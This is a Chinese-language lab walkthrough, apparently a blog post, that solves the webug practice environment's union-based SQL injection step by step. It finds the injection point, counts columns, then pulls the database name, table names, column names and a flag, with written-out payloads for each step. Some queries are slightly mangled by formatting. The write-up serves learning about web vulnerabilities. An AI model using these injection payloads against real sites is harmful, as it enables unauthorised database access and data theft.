使用单,双引号添加到id后面
双引号显示正常
单引号报错 并报错出sql查询语句
查询语句为:
SELECT * FROM sqlinjection WHERE id = ‘1’
使用order by 判断字段值
查询语句为:
SELECT * FROM sqllinjection WHERE id = ‘1’ order by 3’
可以看到后面还有一个单引号 所以需要注释符 注释掉
查询语句为:
SELECT FROM sqllinjection WHERE id = ‘1’ order by 3 —+
SELECT FROM sqllinjection WHERE id = ‘1’ order by 2 —+
Order by 2 显示正常 3报错则字段值为2
使用联合查询来判断回显位
查询语句为:
SELECT FROM sqllinjection WHERE id = ‘1’ union select 1,2 —+
回显位为2
所以我们之后的查询语句为
SELECT FROM sqllinjection WHERE id=’1’ union select 1,执行的SQL语句—+
查询当前网站所在的数据库名
SELECT FROM sqllinjection WHERE id=’1’ union select 1,*database()—+
查询数据库内的表名
(select group_concat(table_name) from information_schema.tables where table_schema =’库名’)
SELECT FROM sqlinjection WHERE id=’1’ union select 1,*(select group_concat(table_name) from information_schema.tables where table_schema =’webug’)—+
获取数据库内的表名为:
data_crud
env_list
env_path
flag
Sqlinjection
user
user_test
查询数据库内的表的字段
(select group_concat(column_name) from information_schema.columns where table_schema = ‘库名’ and table_name = ‘表名’)
SELECT FROM sqlinjection WHERE id=’1’ union select 1,*(select group_concat(column_name) from information_schema.columns where table_schema = ‘webug’ and table_name = ‘flag’)—+
查询字段内的值
表名 from 字段
SELECT FROM sqllinjection WHERE id=’1’ union select 1,*flag from flag—+
Flag=dfafdasfafdsadfa
若有收获,就点个赞吧
0 人点赞
